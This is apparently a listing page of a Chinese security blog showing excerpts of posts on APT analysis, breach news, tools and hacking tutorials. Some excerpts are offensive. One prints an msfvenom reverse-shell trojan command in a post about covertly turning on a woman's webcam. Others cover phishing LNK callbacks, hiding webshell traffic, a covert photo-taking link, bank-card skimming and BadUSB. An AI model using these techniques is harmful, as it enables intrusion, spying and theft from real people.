登陆 注册
  • LuminousMoth样本分析报告

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言2021年7月,卡巴斯基发现一种针对东南亚的攻击活动,被称作LuminoutMoth。该活动至少可以追溯到2020年10月,早期的攻击大多在缅甸但现在主要在菲律宾,目前发现缅甸共有100多名受害者,菲律宾有1,400名受害者,其中一些受害者是政府实体。源头APT组织向受害者发送包含Dropbox下载链接的钓鱼邮件,通过将file_subpath参数设置为...

  • 一次渗透妹子电脑开摄像头全过程

    桑云信息安云桑云信息安云 2021-07-27

    具体思路第一步构建恶意文件1.指定一个可执行程序 捆绑木马msfvenom -p windows/x64/meterpreter_reverse_tcp -e x64/zutto_dekiru LHOST=[IP] LPORT=3333 -x webshell.exe ...

  • 关于快速验证低危与中危漏洞

    桑云信息安云桑云信息安云 2021-07-27

    漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。按照危害也被分为高、中、低三种。低危X-Frame-Options Header未配置查看请求头中是否存在X-Frame-Options Header字段http://google.com会话Cookie中缺少secure属性(未设置安全标志的Cookie)...

  • 东京奥运会出现148个钓鱼网站 门票购票者及志愿者信息泄露

    桑云信息Lzers桑云信息Lzers 2021-07-27

    据媒体报道,一位日本早稻田大学教授称已出现1753个与东京奥运会和残奥会官方网站相类似的域名,其中148个可能被以盗取个人信息等为目的的恶意虚假网站所使用。报道指出,调查组调查了截至举办开幕式的23日获取的含有“tokyo”、“2020”、“olympic”等多个单词的可能被误认为官方网站的域名数。在1753个域名中,有148个域名很可能是浏览后会感染电脑病...

  • 电商老板转行开卡业务员,疯狂盗取公民“人脸信息”被宁波警方抓获

    桑云信息Lzers桑云信息Lzers 2021-07-27

    家住海曙的邓先生前段时间经历了一场由普通人到诈骗嫌疑人又到受害人的三重身份转变,而这一波三折的身份变化都是在邓先生毫不知情的情况下发生的。到底怎么回事?这一切还要从邓先生一张无辜被“盗”的脸说起↓↓↓今年2月,手机卡办理专员小谢和小俞敲开了邓先生家的门,他们向邓先生热情介绍了新卡套餐,面对“无限流量”“充值返现”“超低月租费”等优惠力度,邓先生一下子就动了心...

  • 干货 | 邮件钓鱼攻击学习

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下,顺便让好哥哥们复习一下基础。钓鱼手段Lnk(快捷方式)可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD当我点击谷歌浏览器时,弹出了CMD可以进行更改图标快速...

  • 【防溯源】如何优雅的隐藏你连接 Webshell 的真实 IP

    桑云信息Lzers桑云信息Lzers 2021-07-26

    前言用过云函数的 XD 们都知道,它可以用来帮助我们转发请求,但是这种方法已经被老外玩烂了,但是也很实用!由于它自带 CDN 这样我们每次请求 Webshell 的时候 IP 都是不同的,从而达到隐藏 RT 的效果!还是那句话,一个合格的 RedTeam 被溯源到是很可耻的!如何优雅的隐藏你连接 Webshell 的真实 IP云函数隐藏 Websh...

  • 一张图就是一份木马?谨防游戏交易诈骗

    桑云信息Lzers桑云信息Lzers 2021-07-21

    在这个瓜田里猹乱窜的炎炎暑假相信很多已经从学校跑路的网瘾少年正在愉快地吹着空调打着游戏吃着瓜而据《2020老年人互联网生活报告》数据显示还有10万网瘾老人日均在线超过10个小时带着老花镜围观中国汉字新解当然勤奋的骗子也摩拳擦掌等候多时了无论是游戏账号交易,还是虚拟物品交易,层层的套路陷阱已为网瘾老少爷们儿铺展开望诸君保持清醒,举一反三,victory!1小时...

  • 黑客团伙利用SSH暴力破解器入侵远程设备 用于挖矿和DDoS攻击

    桑云信息Lzers桑云信息Lzers 2021-07-21

    来自 Bitdefender 的安全研究人员在上周发布的安全公告中表示,这款称之为“Diicot brute”的密码破解工具通过软件即服务(software-as-a-service)模型进行分发,每个威胁行为者都提供自己独特的 API 密钥以促进入侵。在远程攻击成功之后除了部署恶意程序用于挖矿之外,该团伙还连接了至少 2 个 DDoS 僵尸网络,包括一个名...

  • CVE-2021-28316漏洞复现

    桑云信息Lzers桑云信息Lzers 2021-07-21

    前言:这两天有人发了一篇文章给我,这两天趁着下班加班加点看了一下漏洞逻辑,发现这个漏洞贼有意思,就水一篇关于这篇漏洞的原理,实践等五一有空再做吧。1.漏洞利用windows10在锁屏的时候,通过UI界面可以进行无线连接,这时候我们通过伪造恶意无线。(当然这里有另一种玩法就是如果PC有设置为自动连接WIFI,我们伪造SSID也能获取到密码,前提是知道SSID是...

  • LuminousMoth样本分析报告

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言2021年7月,卡巴斯基发现一种针对东南亚的攻击活动,被称作LuminoutMoth。该活动至少可以追溯到2020年10月,早期的攻击大多在缅甸但现在主要在菲律宾,目前发现缅甸共有100多名受害者,菲律宾有1,400名受害者,其中一些受害者是政府实体。源头APT组织向受害者发送包含Dropbox下载链接的钓鱼邮件,通过将file_subpath参数设置为指向带有.DOCX后缀的文件名,该链接指向一个伪装成Word文档的RAR压缩包。hxxps://www.dropbox[...

  • 一次渗透妹子电脑开摄像头全过程

    桑云信息安云桑云信息安云 2021-07-27

    具体思路第一步构建恶意文件1.指定一个可执行程序 捆绑木马msfvenom -p windows/x64/meterpreter_reverse_tcp -e x64/zutto_dekiru LHOST=[IP] LPORT=3333 -x webshell.exe -i 12 -f exe -o /root/webshell.exe2...

  • 关于快速验证低危与中危漏洞

    桑云信息安云桑云信息安云 2021-07-27

    漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。按照危害也被分为高、中、低三种。低危X-Frame-Options Header未配置查看请求头中是否存在X-Frame-Options Header字段http://google.com会话Cookie中缺少secure属性(未设置安全标志的Cookie)当cookie设置为Secure标志时,它指示浏览器只能通过安全SSL/TLS通道访问cookie。未设置HttpOnl...

  • 干货 | 邮件钓鱼攻击学习

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下,顺便让好哥哥们复习一下基础。钓鱼手段Lnk(快捷方式)可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD当我点击谷歌浏览器时,弹出了CMD可以进行更改图标快速生成lnk样本$WshShell = New-Object \-comObject&nbs...

  • 【防溯源】如何优雅的隐藏你连接 Webshell 的真实 IP

    桑云信息Lzers桑云信息Lzers 2021-07-26

    前言用过云函数的 XD 们都知道,它可以用来帮助我们转发请求,但是这种方法已经被老外玩烂了,但是也很实用!由于它自带 CDN 这样我们每次请求 Webshell 的时候 IP 都是不同的,从而达到隐藏 RT 的效果!还是那句话,一个合格的 RedTeam 被溯源到是很可耻的!如何优雅的隐藏你连接 Webshell 的真实 IP云函数隐藏 Webshell 真实 IP首先来到腾讯云后台找到云函数,我们使用自定义的模版:然后依次点击函数服务->函数管理->函...

  • CVE-2021-28316漏洞复现

    桑云信息Lzers桑云信息Lzers 2021-07-21

    前言:这两天有人发了一篇文章给我,这两天趁着下班加班加点看了一下漏洞逻辑,发现这个漏洞贼有意思,就水一篇关于这篇漏洞的原理,实践等五一有空再做吧。1.漏洞利用windows10在锁屏的时候,通过UI界面可以进行无线连接,这时候我们通过伪造恶意无线。(当然这里有另一种玩法就是如果PC有设置为自动连接WIFI,我们伪造SSID也能获取到密码,前提是知道SSID是啥)并开启扩展身份验证协议。如果当前PC为域用户,当PC连接到恶意WIFI的时候,会进行ms-chapv2认证,并把自己...

  • 技术分享 | 基于windows操作系统的锦行蜜罐新节点技术

    jinxingjinxing 2021-05-31

    摘要基于诱捕节点,蜜罐可以实现攻击欺骗转移和资产隔离防护。但是现有诱捕节点的实现技术存在IP地址资源的分配和冲突的风险,日常维护要求高,需要配备专业的网管人员,增加人力成本。本文锦行科技提出了一种新的基于windows操作系统的诱捕节点实现技术,利用Libuv库以及采用多进程服务架构技术,在诱捕节点模拟主机网络服务,并通过采用linux虚拟网卡技术的中间层服务实时转发到蜜罐主机中,实现整个攻击者攻击行为的监控及告警功能,解决了现有技术中存在IP地址资源的分配和冲突的风险,增加...

  • 技术分享 | Fastjson-RCE漏洞复现

    Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。影响版本Fastjson1.2.47以及之前的版本复现1.1 环境准备攻击机1用于接受反弹shell系统:Win10 x64安装nc,b...

  • 在吗宝贝?你点开这个网址看看[打开网站偷拍照片]

    桑云信息Lzers桑云信息Lzers 2021-05-01

    最近忙着开公司,所以一直没有管过黑白网。刷抖音期间,偶然发现是2020年发布的文章点开一个网址我被记录了ip还偷拍了照片,被人实现了具体功能。网恋奔现前先打开网址偷拍个照片看看。趁着5.1空闲,重构了代码,并实现了具体功能。如下图所示图片依然存放于本地img目录,新增了查询功能,毕竟之前只是个思路.其中sc.php为生成路径<script> function  create() {     ...

  • 从Web日志还原SQL注入拖走的数据

    桑云信息Lzers桑云信息Lzers 2021-04-07

    利用SQL注入漏洞拖库,从而导致数据泄漏。一般的排查方式,我们可以使用关键字进行搜索,找到可疑的url尝试进行漏洞复现,通过Web访问日志来还原攻击路径,从而确定问题的根源。但是,有一个问题却一直困扰着我,攻击者通过SQL注入漏洞到底获取了什么数据?是所有的数据,还只是访问了其中的一张表?理论上,假设所有的url参数请求日志都记录完整的话,只需要重放每一个请求,然后根据请求响应的情况,就可以一步步还原出被攻击者拖走的数据。为此,我们来搭建一个场景来做攻击数据还原,验证一下这个...

  • 【保姆级资源分享】BurpSuite2021.4资源分享

    桑云信息安云桑云信息安云 2021-04-13

    0X00 一次艰难的安装经历折腾一下午BurpSuite终于折腾好了,折腾的过程中发现市面上大多数的安装教程都非常点到为止(说白了就是看不懂),于是就自己写一篇分享给大家,同时也是我学习过程中的一次记录,如果在安装过程中有任何问题,可以在公众号后台给我留言,我看到会一一解答PS:本篇教程仅适用于windows用户,Linux和Mac用户请自行查找教程 0X01 BurpSuite2021.4更新日志BurpSuite2021.4发布于2021年4月1日,处于测试版此...

  • 安全事件应急响应工具箱

    桑云信息Lzers桑云信息Lzers 2021-01-18

    收集了一些常见的安全事件应急响应工具和资源列表,总收集47款实用工具,包括多引擎病毒检测、病毒查杀、勒索病毒搜索引擎、webshell检测、在线沙箱、安全分析、流量分析和日志分析等工具。01、多引擎在线病毒扫描当发现一个可疑的异常文件,使用多个不同的病毒引擎进行扫描检测,确认文件是否是恶意代码。VirSCAN:免费多引擎在线病毒扫描1.02版,支持47个杀毒引擎。https://www.virscan.org/VirusTotal:一个提供免费的可疑文件分析服务的网站。htt...

  • CS4.0渗透神器源代码下载

    桑云信息安云桑云信息安云 2020-11-16

    最近几天,有人称在GitHub发现了一个名为“Cobalt Strike”的文件夹,据称是渗透测试工具Cobalt Strike 4.0的源代码。CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架,常被业界人称为CS神器。Cobalt Strike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马、office宏代码生成,包括站点克隆获取浏览器等功能,该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节,它分为客户端与服务端,服务端是一...

  • 蜜罐opencanary_web与hfish

    桑云信息Lzers桑云信息Lzers 2020-11-09

    opencanary_web:一个开源的Linux蜜罐框架opencanary_web是一个Linux web蜜罐管理系统。基于Tornado+Vue+Mysql+APScheduler+Nginx+Supervisor。可收集相对全面的攻击信息,还具有很多管理功能,如白名单/邮件/过滤等。可统计信息ftp登录尝试;http访问请求;http登录请求;ssh建立连接;ssh远程版本发送;ssh登录尝试;telnet登录尝试;全端口(SYN)扫描识别;NMAP OS扫描识别;N...

  • GitHub推出官方代码扫描工具,免费查找漏洞

    Guy_PsychoGuy_Psycho 2020-10-06

    在 GitHub 发布项目之前,你可以用免费的官方代码扫描程序来检查 Bug 了。机器之心报道,作者:蛋酱编程很难,难就难在常有 Bug 而不自知。有程序员调侃:「我不是在写代码,我是在写 Bug。」从现在开始,你在 GitHub 上传的代码可以免费使用 Bug 筛查程序了。早发现,早报告,早诊断…… 以及早修复。去年 9 月,GitHub 收购代码分析平台企业 Semmle,宣布将在 GitHub 的开发者工作流程中引入代码安全性流程。代码扫描是 GitHub Adva...

  • 工具|Windows提权漏洞库+EXP/POC

    Guy_PsychoGuy_Psycho 2020-09-18

    按照老规矩,话不多说,直接上图打开后这样:然后在cmd输入systeminfo命令获取到:输入软件里边然后点击文本处理:点击判断:hash值:文件名称: D:\编程\提权漏洞搜索.exe文件大小: 18.0 MB (18,882,560 字节)文件版本: 1.0.0.0修改时间: 2020年09月15日,06:09:17MD5: C7D7EA81AACA8BB915F368589A98CB97SHA1: 0555CDA61443B90F5DA0C48CCD6996460DBC...

  • 安全技术|利用OpenVpn配置文件反制的武器化探索

    OpenVPN是企业常用的数据传输工具,然而使用不信任的ovpn文件是十分危险的,一旦被恶意利用可能会导致企业的数据信息泄露。本文由锦行科技的安全研究团队提供(作者:t43M!ne),介绍了攻击者是如何对OpenVPN的配置文件进行修改,构建出可连接到远程控制端的反制模块,从而实现对OpenVPN用户系统的控制管理,深入探讨“反制”行为。简述无意中看到一篇18年的老文,作者描述了一种利用OVPN文件(即OpenVpn的配置文件)创建一个反弹Shell的操作。核心在于官方声明的...

  • 工具|FOFA API获取GUI工具 - 急速获取

    Guy_PsychoGuy_Psycho 2020-09-13

    工具展示支持仅获取URL模式:支持获取URL+IP+端口模式:采集结果实时更新:后门说明为了方便广大用户采集网站/IP,并且没有后顾之忧的使用我们的工具,特此说明:可对程序进行抓包反编译检查并支持虚拟机运行。其他系统因考虑到可能会有MAC或者Linux主系统用户,所以云剑侠心系列工具支持虚拟机运行啦~获取方式01QQ群获取加入QQ群:795285056 群文件下载即可02获取卡密关注公众号回复【获取卡密】即可获取工具激活卡密,云剑侠心系列工具都可使用此卡密进行激活使用03运营...

  • 渗透利器burp suite新版本v2020.9.1及v2020.8汉化版下载

    Guy_PsychoGuy_Psycho 2020-09-08

    转载自 乌云安全Burp suite是一款抓包渗透必备软件。burp Suite是响当当的web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析,到寻找和利用安全漏洞等过程,所有工具为支持整体测试程序而无缝地在一起工作。一、burpsuite新版本v2020.9.1下载地址:https://pan.baidu.com/s/1uBlh_WRJ5Ziv-zS6ag0QNw  密码:hmvw二、burpsuite新版本v2020.8汉化版BurpSuite_P...

  • 工具|漏洞库EXP/POC搜索工具

    Guy_PsychoGuy_Psycho 2020-09-08

    云剑侠心--工具介绍小白作品看不惯勿喷    最近做渗透测试的时候总是遇到各种CMS,然后还得一个站一个站的去搜索对应漏洞,所以为了方便一些做了一个集成漏洞搜索工具,并且漏洞库每一个小时更新一次,确保漏洞库处于最新状态。打开工具直接输入漏洞关键词搜索即可搜索出来的内容会显示出来漏洞介绍查看漏洞详情或者漏洞的POC/EXP脚本选择漏洞后右键打开即可如何--下载激活工具    加入QQ群:795285056 群文件下载即可。&nb...

  • 黑客世界杯上,杀出了一群强悍的鹅

    Guy_PsychoGuy_Psycho 2020-08-21

    “逆转了,逆转了!超过PPP了!”会议室的门突然被打开,里面涌出了一群眼里充满血丝、头发蓬乱的年轻人,在过道上兴奋地大声欢呼、嚎叫,仿佛置身于奥运夺冠现场。“终于赢了!”已经连续几天没睡过一个好觉的Manuel喜极而泣,“五年了,终于赢了!” 宣布A*0*E战队夺得本届冠军的放榜瞬间在经过59个小时的鏖战后,腾讯A*0*E联合战队以970分的总成绩在16支全球顶尖战队中脱颖而出,拿下了“黑客世界杯”——DEF CON CTF决赛的全球总冠军,刷新了中国战队的最佳记录...

  • 一步步教你制作移动式银行卡信息读取器

    桑云信息安云桑云信息安云 2020-06-29

    我先上图吧,看看你是不是感兴趣:侧面图:正面图: 拿着它扫了一下我姥姥的裤兜:过了几秒,手机收到一封邮件!如果看到这你兴奋了,那么接着往下看看:背景:半年前,我从网上看到一个视频,讲的大概是一个人站在了一个人的旁边,待了几秒,然后就知道了那个人的银行卡信息了,而且不仅是银行卡信息,甚至连持卡人的姓名,身份证号都有。我看完之后,当时就惊呆了。现在的人都这么牛了吗?于是不假思索的也从网上买了一个一模一样的NFC读卡器,幻想着自己也可以这么厉害。可是货一到,热情就没了,因...

  • 低成本制作一条BadUSB数据线

    十年十年 2020-06-19

    本文作者:piptsmile在badusb的攻击方式被使用以来大多都是伪装成U盘或没有伪装就是一个裸板,毫无疑问裸板是最明显的了,谁会将一个莫明奇妙的线路板(例如digispark)插在电脑上。随着安全知识的普及,U盘这种伪装也越来越不可行了。所以“数据线”就成了一个好思路,伪装成数据线的badusb工具有很多,那些都是有蓝牙远程注入的功能,功能很强,成本稍高,价格也就稍高了些。如果不需要远程的功能,那就自己DIY一个超级小的digispark安装到数据线里吧!一.board...

  • 黑科技:把手机DIY成一台硬件WAF

    十年十年 2020-06-19

    本文作者:w2sfoot   WAF即Web应用防火墙(Web application firewall),是用于网站安全防护的。在当下的等保2.0时代,给网站部署WAF做防护,对网站运营者来说是必不可少的,WAF也逐渐被互联网人群熟知。一般的WAF,也就是防护网络攻击的产品而已,并没有太多新奇,并不有趣。而本文,将实现一个黑科技:把手机做成一台硬件WAF,科幻感有没有?先看一下,实现效果:即:手机成了一台硬件WAF,电脑上可以访问WAF,可以访问被手机防...

  • 手把手教你如何将学校饭卡复制到小米手环NFC版上

    阿拉丁神灯阿拉丁神灯 2020-05-30

    *严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。一、NFC是什么?NFC是Near Field Communication缩写,即近距离无线通讯技术。由飞利浦公司和索尼公司共同开发的NFC是一种非接触式识别和互联技术,可以在移动设备、消费类电子产品、PC和智能控件工具间进行近距离无线通信。NFC功能提供了一种简单、触控式的解决方案,可以让消费者简单直观地交换信息、访问内容与服务。二、NFC功能的应用场景:手机或手环等带有NFC功能的设备通过模拟IC卡的操作,...

  • 对机械锁具的旁路攻击

    SammiSammi 2020-05-29

    没有钥匙,不撬锁,能不能开门?不接触锁具,能不能配出把钥匙? 01Lock Pick 和 Lock bypass 的区别前几天,“回形针”发布了Vol.121《开锁师傅对你的锁做了什么》,用动画描述了常用弹子锁的结构和各种开锁工具的原理,详细清晰。请看:https://mp.weixin.qq.com/s/fDf4yIBCc8X5AP_xZhj9Bg“回形针”讲的是“Lock Pick”,是指通过对锁具部件的破解或破坏来开锁,也就是常见的开锁师傅使用的方法。&nbs...

  • DIY | 树莓派搭载kali Linux

    桑云信息安云桑云信息安云 2020-03-08

        受疫情影响,宅在家的时间多了起来,年前购买的树莓派4B(Raspberry Pi)也终于有空倒腾一番。在去年的某大型攻防演习行动中,听说过无人机+树莓派进行无线wifi攻击的神操作,惊为天人,一直想动手试一试,今天就先在树莓派中装上渗透利器kali Linux。0x01 关于树莓派     树莓派(Raspberry Pi)是尺寸仅有信用卡大小的一个小型电脑,使用博通(Broadcom)出产的ARM架构处理器...

  • 手把手教大家搭建一个低成本的多功能移动渗透测试站点

    桑云信息安云桑云信息安云 2020-02-09

    0×01-开篇:凡是搞过物联网开发的朋友们都应该知道树莓派这个东东吧?特别是RPI ZERO,小身材,大功能!没错,就是它!今天我就手把手教大家如何用树莓派zero w/3b/3b+/4b搭建一个低成本的多功能移动渗透测试站点,以及wireshark和mdk3使用方法。而且还可以使用这个系统进行办公,编程,播放影音,上网,玩游戏等操作!(那就不能用zero了,如果想一板多用请使用3b+或4b!)本文使用zero w进行演示,本文的教程对于其他型号树莓派板子也适用,如...

  • Badusb黑客硬件烧写

    桑云信息Lzers桑云信息Lzers 2019-10-28

    在文章开始之前我们先看看BadUSB内部构造在接下来看看BadUSB HID的攻击原理以及优势HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,本文要介绍的Badusb利用的是虚拟键盘来实现恶意代码...

  • 制作HackCube中的坎坎坷坷

    小威小威 2019-10-01

    初试HackCube由于自己对于无线电方面的信息安全的热爱。在中秋放假之前自己按照360无线电无线电研究院的帖子DIY了一个hack cube。这个hack cube我只使用了其中的一部分,很多部分我都没有DIY。主要还是不是很感兴趣。包括里面的NFC,2.Gh我都没有,我只为了研究1Ghz以下的频段。在接下来的文章中,我将会从开始电路焊的连接,程序烧写,测试运行。首先说一下电路的连接的问题:虽然在原帖上已经有了电路的连接方式,但是在这里我还是将连接方式图全部贴了出来,这方便...

  • 东京奥运会出现148个钓鱼网站 门票购票者及志愿者信息泄露

    桑云信息Lzers桑云信息Lzers 2021-07-27

    据媒体报道,一位日本早稻田大学教授称已出现1753个与东京奥运会和残奥会官方网站相类似的域名,其中148个可能被以盗取个人信息等为目的的恶意虚假网站所使用。报道指出,调查组调查了截至举办开幕式的23日获取的含有“tokyo”、“2020”、“olympic”等多个单词的可能被误认为官方网站的域名数。在1753个域名中,有148个域名很可能是浏览后会感染电脑病毒或被盗走个人信息的虚假网站。报道称已发现有东京奥运门票购票者及志愿者的ID和密码在网络上泄露。黑客通过此类虚假网站盗取...

  • 电商老板转行开卡业务员,疯狂盗取公民“人脸信息”被宁波警方抓获

    桑云信息Lzers桑云信息Lzers 2021-07-27

    家住海曙的邓先生前段时间经历了一场由普通人到诈骗嫌疑人又到受害人的三重身份转变,而这一波三折的身份变化都是在邓先生毫不知情的情况下发生的。到底怎么回事?这一切还要从邓先生一张无辜被“盗”的脸说起↓↓↓今年2月,手机卡办理专员小谢和小俞敲开了邓先生家的门,他们向邓先生热情介绍了新卡套餐,面对“无限流量”“充值返现”“超低月租费”等优惠力度,邓先生一下子就动了心,随后在专员小谢“手把手”贴心帮助下,很快用自己的身份证,刷脸办好了新卡。让邓先生没想到的是,这次送上门的“大馅饼”竟然...

  • 一张图就是一份木马?谨防游戏交易诈骗

    桑云信息Lzers桑云信息Lzers 2021-07-21

    在这个瓜田里猹乱窜的炎炎暑假相信很多已经从学校跑路的网瘾少年正在愉快地吹着空调打着游戏吃着瓜而据《2020老年人互联网生活报告》数据显示还有10万网瘾老人日均在线超过10个小时带着老花镜围观中国汉字新解当然勤奋的骗子也摩拳擦掌等候多时了无论是游戏账号交易,还是虚拟物品交易,层层的套路陷阱已为网瘾老少爷们儿铺展开望诸君保持清醒,举一反三,victory!1小时候:千万不要吃陌生人给的糖长大了:千万不要收陌生人给的文件你卡了? 不,你没有,这就是张正在加载的图片图片太大...

  • 黑客团伙利用SSH暴力破解器入侵远程设备 用于挖矿和DDoS攻击

    桑云信息Lzers桑云信息Lzers 2021-07-21

    来自 Bitdefender 的安全研究人员在上周发布的安全公告中表示,这款称之为“Diicot brute”的密码破解工具通过软件即服务(software-as-a-service)模型进行分发,每个威胁行为者都提供自己独特的 API 密钥以促进入侵。在远程攻击成功之后除了部署恶意程序用于挖矿之外,该团伙还连接了至少 2 个 DDoS 僵尸网络,包括一个名为 chernobyl 的 Demonbot 变体和一个 Perl IRC bot,以及 XMRig 自 2021 年...

  • 重磅消息!2021 DAMS中国数据智能管理峰会将于8月在上海盛大举办

    桑云信息Lzers桑云信息Lzers 2021-06-21

    2021 DAMS中国数据智能管理峰会,将在8月27日于上海正式举行。经过成功创办七年大会的经验积淀,本次DAMS峰会结合行业趋势与技术热点,携手中国信通院云大所、阿里、腾讯、京东、蚂蚁集团、美团、携程、快手、工商银行、平安银行、农业银行、光大银行、快狗打车、哈啰出行、快看、新炬网络等产研界技术领跑单位,带来大数据、数据资产管理、数据安全治理、数据库、运维、金融科技等领域的先进理念和最佳实践,不容错过的精彩看点一起先睹为快!  时间:2021年8月27日地...

  • “桑云”来了

    桑云信息Lzers桑云信息Lzers 2021-06-03

    以黑客视角诠释每一个问题,企业并非朝花夕拾在这个燥热的夏天,一群怀揣梦想的中二少年在位于天府之国的四川注册了一家公司“桑云”5月5号急匆匆的付了门店房租,赶鸭子上架般开始了第一次创业。30平的小店该如何装修?公司名字叫什么?我的主营方向是什么?是的,我没有任何实际的想法。我还沉浸在18岁的夏天,刚刚成年什么也不需要考虑。辗转反侧的失眠,前路迷茫且布满荆棘,我的理想是什么?或许是成家立业又或许是得到家人的认可。任前路漫漫,当披荆斩棘我们的服务一、开发类l 各行业小程序...

  • 九价疫苗预约一针难求?黑客居然动起了歪脑筋

    桑云信息安云桑云信息安云 2021-04-10

    九价HPV疫苗市场需求量巨大该疫苗虽已于2018年5月在国内正式获批上市但仍是“一针难求”不少女性甚至男性为了尽早接种不惜花重金到私人中介处购买“九价HPV疫苗”一些不法分子因此动起了“歪脑筋”。2021年1月,南京警方接到某妇幼保健所报警称,其微信公众号hpv疫苗接种预约系统上出现两个异常预约,有两名用户在非正常预约时间段完成了线上预约,获取了疫苗接种资格。南京警方从两个异常预约用户高某、张某入手侦察。经调查发现,高某、张某都是长期预约不到HPV九价疫苗,于是在网上搜索联系...

  • 黑客论坛出售领英5亿用户信息

    桑云信息安云桑云信息安云 2021-04-10

    近年来,全球信息安全问题频发,一些大型网络企业也深陷其中,如被数据泄露缠身的Facebook,4月3日又被曝超5亿用户数据泄露。几天之后,职业社交网站领英也被爆出信息泄露事件。4月6日,据Cyber News报道,有人在某黑客论坛发帖称拥有5亿领英用户的数据并会对外销售,然后提供了200万条记录作为样本以供验证。黑客首批公布了4个文件,并表示已经通过爬虫抓取到大量用户数据。用户仅需要支付2美元就可以查看首批公开的样本。后续5亿的用户数据库,价格至少会是四位数美元,可能以比特币...

  • 内鬼黑客狂卖个人信息 泄露数达55.3亿条,催生“年产值”上千亿数据黑市

    桑云信息安云桑云信息安云 2021-04-10

    近期,证券时报记者深入多个数据交易千人QQ群发现,各行各业的用户隐私数据被肆意贩卖,触目惊心。不时有人在群里喊单,“出一手GM(股民)、WD(网贷)、BJ(保健)信息,拼多多、淘宝、京东一手网购数据,需要数据的联系我……”这些数据按照行业划分被明码标价。甚至还有采集个人信息的系统展示,号称可以采集全国老板的私人联系方式。还有五花八门爬取数据的软件,“爬”上网站,“嵌”入APP,“铲”下数据。整个数据交易过程中,内鬼、黑客、爬虫软件开发商、清洗者、加工者、料商、买家等寄生于此,...

  • 顶级网红UP主公然传授“人肉”秘籍引发网络狂喷!

    桑云信息安云桑云信息安云 2021-04-10

    这个事情也是引发了相当大的震动。毕竟这个up主的影响力太大,认识的同学自不必说,不认识的可以想象一位每个投稿阅读量都在一两百万的up主是个什么档次,几乎是头部顶级网红up主了。先说个明星的事情,邢菲。前天她的热搜也是令人非常的惊悚,有个男的持续跟踪她,人肉她的各种信息,包括下榻的酒店,路线等等。目前猜测此人可能是所谓的私生饭:官方已经报警:这是邢菲自己发的,事情应该比较严重了:显然,这个明星被人肉乃至跟踪已经不是一起两起,在网络上,目前已经明确人肉搜索一个人是违法行为。但是,...

请关注微信公众号
微信二维码
不容错过
安全文摘 更多
安全工具 更多
Powered By SangYun.Net